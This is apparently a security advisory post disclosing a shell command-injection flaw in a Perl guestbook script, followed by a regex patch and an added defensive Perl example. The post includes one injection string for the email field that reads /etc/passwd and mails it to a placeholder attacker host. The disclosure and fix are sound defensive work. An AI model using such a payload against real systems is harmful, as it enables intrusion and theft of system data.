hi all

I found a security hole in Book of guests and Post it! written by Seth Leonard. It is available at http://www.dreamcachersweb.com

The problem is that this script doesn't filter out ANY metacharacters from the input and passes it to the shell. Therefore by writing something like

    email@mail.com;cat /etc/passwd|mail evil@evilhost.com

into the email field, the attacker could take control over the host.

patch:

First of all it isn't a bad idea to set the permissions of the script correctly. Furthermore the line

    if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... }

should be replaced by something like

    if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }

David Kumme, 16
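As an added example (not from the original post and not Seth Leonard's script), here is the anchored check from the patch in a complete Perl snippet, paired with the list form of open() so the address never reaches a shell at all; the /usr/bin/mail path and its -s flag are assumptions.

```perl
#!/usr/bin/perl
# Added example: validate the guestbook email field before it can reach a
# shell, and pipe to mail without invoking a shell in the first place.
use strict;
use warnings;

# Anchored whitelist: word characters, dots and hyphens on both sides of a
# single '@'. ';', '|', spaces and newlines are rejected. \z is used instead
# of $ so that a trailing newline is rejected too.
sub valid_email {
    my ($addr) = @_;
    return (defined $addr && $addr =~ /^[\w.-]+\@[\w.-]+\z/) ? 1 : 0;
}

# Hypothetical replacement for a shell-based "| mail $email" pipe: the list
# form of open() runs /usr/bin/mail directly, so $addr is handed over as one
# literal argument and is never interpreted by sh.
sub send_notification {
    my ($addr, $body) = @_;
    die "refusing to mail to invalid address\n" unless valid_email($addr);
    open(my $mail, '|-', '/usr/bin/mail', '-s', 'Guestbook entry', $addr)
        or die "cannot run mail: $!\n";
    print $mail $body;
    close($mail) or warn "mail exited with status $?\n";
    return 1;
}

# Constructed inputs: a normal address and the injection string from the
# advisory, which the anchored pattern rejects before any command runs.
my @inputs = (
    'user@example.com',
    'email@mail.com;cat /etc/passwd|mail evil@evilhost.com',
);
for my $in (@inputs) {
    printf "%-56s -> %s\n", $in, valid_email($in) ? 'accepted' : 'rejected';
}
```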